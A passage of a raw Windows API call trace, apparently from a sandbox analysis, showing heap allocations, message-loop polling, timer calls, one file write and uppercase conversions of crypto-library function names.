0x2e512c8 [0241.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0241.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0241.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55118 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0241.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0241.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0241.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0241.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0241.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0241.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0241.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0241.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0241.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0241.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0241.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0241.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0241.065] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0241.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0241.066] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0241.066] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.066] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551c8 [0241.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55198 [0241.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551f8 [0241.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0241.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0241.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0241.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0241.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0241.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55198 | out: hHeap=0x970000) returned 1 [0241.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0241.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0241.067] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0241.067] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e552f8 [0241.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552f8 | out: hHeap=0x970000) returned 1 [0241.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0241.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0241.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0241.067] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0241.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0241.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0241.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0241.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0241.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0241.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0241.067] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0241.067] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0241.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0241.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0241.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xea00) returned 0x2e8ed38 [0241.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0241.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0241.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0241.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0241.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0241.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0241.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0241.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0241.068] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xea00) returned 0x2e9d740 [0241.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8ed38 | out: hHeap=0x970000) returned 1 [0241.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.069] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0241.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0241.069] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.069] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0241.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0241.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0241.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0241.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0241.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0241.070] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0241.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0241.070] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0241.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0241.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0241.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0241.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0241.070] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0241.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0241.070] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0241.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0241.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0241.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0241.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0241.070] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0241.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0241.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0241.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0241.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0241.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51220 [0241.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0241.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0241.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512b0 [0241.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51070 [0241.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f648 [0241.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51238 [0241.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0241.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510a0 [0241.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0241.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0241.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0241.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0241.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0241.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0241.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0241.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0241.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0241.072] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0241.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04118 [0241.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0241.072] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0241.072] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0241.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0241.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.072] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0241.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0241.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0241.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.079] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0241.079] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.079] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0241.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0241.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.083] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14818*, nNumberOfBytesToWrite=0xea00, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14818*, lpNumberOfBytesWritten=0x8cf5e4*=0xea00, lpOverlapped=0x0) returned 1 [0241.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0241.086] TranslateMessage (lpMsg=0x8cf708) returned 0 [0241.086] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0241.086] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0241.086] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0241.086] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0241.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0241.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0241.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0241.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0241.087] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0241.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0241.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0241.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0241.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0241.087] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0241.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0241.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f38 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0241.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0241.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.088] 